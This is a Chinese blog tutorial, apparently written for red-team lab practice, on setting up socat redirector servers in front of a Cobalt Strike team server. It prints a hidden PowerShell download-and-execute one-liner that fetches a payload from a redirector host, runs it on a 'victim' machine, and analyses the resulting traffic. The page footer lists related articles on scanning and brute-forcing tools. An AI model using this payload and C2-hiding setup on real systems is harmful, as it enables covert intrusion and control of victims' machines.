内网渗透神器CobaltStrike之重定向服务配置(二)

已于 2023-08-21 21:35:39 修改
阅读量788 收藏 2
点赞数
分类专栏: 红队的自我修养 文章标签: 渗透测试 kali 安全 web安全 系统安全
于 2022-11-18 15:41:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/127923969
版权

重定向服务的概念

"重定向"是一个在CS服务器与目标主机进行网络传输之间的服务器, 不仅能保护CS服务器, 还能增强与目标网络传输的稳定性, 例如某一台重定向服务器倒塌了, 但是CS服务器还是能通过其他重定向服务器与目标网络进行信息传输


环境拓扑

  • 域名: team.com
  • Dns服务器: 192.168.47.137
  • CS团队服务器: 192.168.47.134(cs.team.com)
  • 重定向服务器1: 192.168.47.131(proxy1.team.com)
  • 重定向服务器2: 192.168.47.140(proxy2.team.com)
  • 目标主机: 192.168.47.141

1


环境搭建

1.在域控为CS服务器及代理服务器配置域名

在域控服务器打开DNS管理器

1


在DNS的正向查找区域新建一个区域, 名为team.com, 即相当于申请一个顶级域名

动画


为新建的区域增添A记录, 如下图所示步骤依次添加CS服务器及代理服务器

  • CS服务器: 别名为team, ip地址为192.168.47.134

  • 代理服务器1: 别名为proxy1, ip地址为192.168.47.131

  • 代理服务器2: 别名为proxy2, ip地址为192.168.47.140

2

1


2.将代理服务器80端口的数据转发到CS服务器80端口上

使用socat命令进行端口转发, 若没有此命令需先使用apt-get install -y socat命令进行安装, socat命令使用语法如下:

socat TCP4-LISTEN:80,fork TCP4:[server ip]:80

将本机80端口监听到的数据转发到server服务器上的80端口


在两台代理服务器(ubuntu0和ubuntu1)上输入: socat TCP4-LISTEN:80,fork TCP4:192.168.47.134:80

动画


攻击步骤

1.在CS客户端创建监听并生成攻击payload

在域内windows7主机登录CS客户端

3


新建http监听80端口, 将代理的服务器域名填写至HTTP Hosts

3


生成Power Shell远程执行代码: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://proxy1.team.com:80/a'))"

动画


浏览器访问http://proxy1.team.com:80/ahttp://proxy2.team.com:80/a, 查看是否有返回结果, 若有则表示攻击payload配置成功

image-20221001230039340


通过查看web日志可以查询到访问域名者的详细信息

image-20221001230512699


2.受害机执行PowerShell恶意代码

在受害机执行powershell恶意代码: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://proxy1.team.com:80/a'))"后, 受害机在CS客户端界面显示上线

1


受害机抓包分析

使用Wireshark抓取HTTP数据包进行分析, 受害机的ip地址为192.168.47.141, 它向192.168.47.140(proxy2.team.com)发http数据包, 随后192.168.47.140192.168.47.134(cs.team.com)发http数据包, 除此之外受害机还向192.168.47.131(proxy1.team.com)发了http数据包

image-20221002004235260

Henry404s
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fscan内网渗透神器
09-21
scan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 2.主要功能 (1)信息搜集: 存活探测(icmp) 端口扫描 (2)爆破功能: 各类服务爆破(ssh、smb、rdp等) 数据库密码爆破(mysql、mssql、redis、psql、oracle等) (3)系统信息、漏洞扫描: netbios探测、域控识别 获取目标网卡信息 高危漏洞扫描(ms17010等) (4)Web探测功能: webtitle探测 web指纹识别(常见cms、oa框架等) web漏洞扫描(weblogic、st2等,支持xray的poc) (5)漏洞利用: redis写公钥或写计划任务 ssh命令执行
探秘网络重定向:解析以太网、IP和DNS流量的全方位详解!
m0_72410588的博客
08-15 438
以太网是目前应用最广泛的局域网技术。它通过使用以太网帧来传输数据,具有较高的传输速率和灵活性。首先,我们将介绍以太网的基本原理和帧格式,为后续的流量重定向奠定基础。IP(Internet Protocol)协议是互联网的核心协议之一,负责将数据包从源主机传输到目标主机。在本节中,我们将深入了解IP协议的基本原理和数据包格式,为后续的IP流量重定向提供必要的背景知识。DNS(Domain Name System)是一个将域名解析为IP地址的分布式命名系统。
网页常用的301重定向和302重定向的实现方法
jianyi7659的专栏
12-07 9165
<br /> 重定向说白了就是通过各种的方法将各种网络请求重新定个方向转到其它位置。<br />  如:网页中的重定向<br />  域名的重定向<br />  路由选择的变化也是对数据报文经由路径的一种重定向<br />  在我们的网站建设中,时常会遇到需要网页重定向的情况:象
cobaltstrike多个版本
12-30
cobaltstrike4.3,cobaltstrike4.4,cobaltstrike4.5三个版本 安装教程以cs4.3为例: 1、xshell上传至kali,解压 unzip cobaltstrike 2、给cs的服务端teamserver和客户端start.sh执行权限 chmod +x teamserver start.sh 3、启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接) ./teamserver 192.168.11.11 123456 4、启动cs的客户端 ./start.sh 如果出现以下报错,说明jdk有问题 Exception in thread "main" java.lang.UnsatisfiedLinkError: Can't load library: /usr/lib/jvm/java-11-openjdk-amd64/lib/libawt_xawt.so 5、重新安装jdk解决以上问题 sudo apt install openjdk-11-jdk -y 6、再次启动c
内网渗透神器fscan扫描工具
12-04
Windows下安装fscan扫描工具 下载go环境;https://go.dev/dl/ 命令行查看go版本 查看go环境,需要设置go env -w GOSUMDB=off 设置go env -w GOPROXY=https://goproxy.cn,direct; go env -w GOPROXY=https://goproxy.cn set GOPROXY=https://goproxy.cn fscan文件下进行编译; go build -ldflags 使用说明 简单用法 fscan.exe -h 192.168.1.1/24 (默认使用全部模块) fscan.exe -h 192.168.1.1/16 (B段扫描) 其他用法 fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) ......
将自己的域名重定向到某网站
热门推荐
zxiaofan.com
02-28 2万+
昨天突然发现自己指向CSDN、GitHub的级域名均无法访问了,后来才发现是因为自己的cn域名没有备案,先前以为实名认证就足够了,晕。域名备案大约需要20天左右,意味着这短时间我的级域名无法访问了,这可绝对不行啊。今儿捣鼓了一上午总算搞定了。 如何将自己的域名(一级或级等,无需备案)重定向到其他网站呢? 所需资源:有公网IP的服务器,域名zxiaofan.cn。 操作步骤:
局域网中的ARP重定向攻击及防御措施
创业轨迹
04-07 6664
摘 要:地址转换协议(ARP)如果被恶意利用,会对局域网产生严重威胁。本文介绍了ARP在TCP/IP协议中的地位和作用,描述了它的工作原理,详细分析了它的几个主要特点,然后通过一个生动的实例介绍了黑客如何利用ARP协议的特点来进行ARP重定向,劫持目标主机与其它主机的会话,通过伪造会话信息实现攻击目的。最后,提出了几种防御ARP欺骗的解决方案并分析了每种方案的利弊及应用场合。关键词:ARP;ARP
黑客常用入侵方式(12种)
weixin_68789096的博客
03-10 1万+
在Interent中,为了防止黑客入侵自己的计算机,就必须了解黑客入侵目标计算机的常用方法。黑客常用的入侵方法有数据驱动攻击、系统文件非法利用、伪造信息攻击以及远端操纵等,下面就简单介绍这些入侵方法。(仅供了解)数据驱动攻击是指黑客向目标计算机发送或复制的表面上看来无害的特殊程序被执行时所发起的攻击。该攻击可以让黑客在目标计算机上修改与网络安全有关的文件,从而使黑客在下一次更容易入侵该目标计算机。数据驱动攻击主要包括缓冲区溢出攻击、格式化字符串攻击、输入验证攻击、同步漏洞攻击、信任漏洞攻击等。
CobaltStrike使用-第一篇(基本使用方法、监听器、重定向器,以及通过重定向器隐藏C2服务器)
Love&Share
11-29 4950
文章目录基本使用客户端与服务器连接上线CS基本步骤基础设施监听器BeaconDNS BeaconDNS请求原理实验避坑重定器实验 Cobalt Strike是一款综合的渗透测试神器 官网:https://www.cobaltstrike.com/ 工具的社区版是Armitage(一个MSF的图形化界面工具),CobaltStrike为收费商业版本 手册:CobaltStrike4.0用户手册_中文翻译、4.3、狼组版 Cobalt Strike使用C/S架构,Cobalt Strike的客户端连接到团.
瑞萨RL78系列单片机CS+(Cube Suite+)下重定向printf函数
wanglong3713的博客。
01-11 2148
一、测试环境 瑞萨Cube Suite+ for CA,CX, Build Tool: CA78K0R, 芯片:RL/78系列R5F100FF (其他版本软件、芯片请自行测试) 各版本如下图: 、代码 1.改写putchar函数 /******************************************************************************* * 函数名:putchar * 功 能:改写putchar函数 * 参 数:无 * 返回值:无
Cobalt Strike 4.5 中英版本一键切换,内置插件
11-18
Cobalt Strike 4.5 内网渗透神器,中英一键切换。免费分享
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。 Cobalt Strike 分为客户端组件和服务器组件。 服务器组件,也就是团队服务器,是 Beacon payload 的 控制器,也是 Cobalt Strike 社会工程功能的托管主机。团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录。 客户端组件:客户端团队成员使用的图形化界面
路由器 网关| 公网、内网 | ICMP的IP重定向报文
hondrif82q的专栏
03-03 2339
1路由器工作在IP层,网关在IP层以上网关是数据出子网的的门户,是一个地址,网关不一定是路由器可以是计算机(但实际上用的也是路由器功能:))。路由器是分析你封装的ip地址,指导数据向那边走的。所以说路由器可以是网关 2公网、内网是两种Internet的接入方式。   内网接入方式:上网的计算机得到的IP地址是Inetnet上的保留地址,保留地址有如下3种形式:   10.x.x.x
保姆级教学!小白也会的cobalt strike搭建
一只web狗
11-05 4324
小白也会的cobalt strike搭建,快速部署
内网渗透神器CobaltStrike配置与基础操作(一)
xf555er的博客
11-18 868
Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。
渗透工具之CS4.0使用说明书
m0_59991869的博客
10-14 4615
CS4.0使用说明书 目录 安装 使用 运行 监听器 listner 使用 不同监听介绍 木马 生成后门 钓鱼攻击 邮件钓鱼 功能 上部选项栏 下部工具栏 beacon的使用 会话功能 安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver
【随笔】转发/转向(服务重定向服务器转发,服务器跳转)和重定向(客户端重定向,客户端转发,客户端跳转)
北极星的博客
04-25 753
(2)服务器端跳转时,JSP执行到跳转语句时会立刻进行跳转,不再执行之后的代码;(1)服务器端跳转时,未超出request的属性范围,request属性能够保存到跳转页;客户端跳转时,则超出了request的属性范围,无法进行其属性的传递。(web应用的根目录指定是项目里的webcontent下的目录,站点根目录指的是http://localhost:8080/后的目录)重定向:A找B要钱,B没钱,于是B将C的联系方式告诉A,然后A再向C借钱。转发:A找B要钱,B没钱,于是B向C借钱,然后将钱给A。
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
最新发布
爱笑的源码博客
05-14 976
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
cobalt strike4.4
11-08
Cobalt Strike 4.4是一款专业的渗透测试工具,由Strategic Cyber LLC开发。它广泛被安全研究人员、红队和渗透测试人员使用,以评估网络安全的弱点和漏洞。 Cobalt Strike 4.4提供了各种功能和技术,包括钓鱼攻击、漏洞利用、社会工程学攻击和内网渗透等。它模拟了真实的攻击场景,能够帮助安全专家发现和修复网络中的安全问题。 其中,钓鱼攻击是Cobalt Strike 4.4的一个重要特性。它通过伪造电子邮件、网站和文件,诱使用户输入敏感信息,例如用户名、密码和信用卡信息。这可用于测试员评估目标组织员工的安全意识和行为。 Cobalt Strike 4.4还支持漏洞利用,用于发现和利用系统和应用程序的漏洞。这些漏洞可能导致入侵者获取未授权的访问权限,从而进一步探索和操纵目标网络。 社会工程学攻击是利用人的弱点和错误来获得机密信息的手段。Cobalt Strike 4.4中的社会工程学攻击模块可通过发送钓鱼电子邮件、制造假网站和执行欺骗性操作,诱使目标用户泄露敏感信息。 内网渗透Cobalt Strike 4.4的另一个重要功能。它模拟渗透攻击者在目标网络中的行为,尝试获取横向权限并访问受限资源。通过内网渗透渗透测试人员可以评估网络安全的脆弱点,并提出相应的解决方案来提高网络的防御能力。 总之,Cobalt Strike 4.4是一款功能强大的渗透测试工具,具有广泛的应用领域。它通过模拟攻击场景,帮助安全专家评估和提高网络安全性,保护组织免受潜在的网络攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值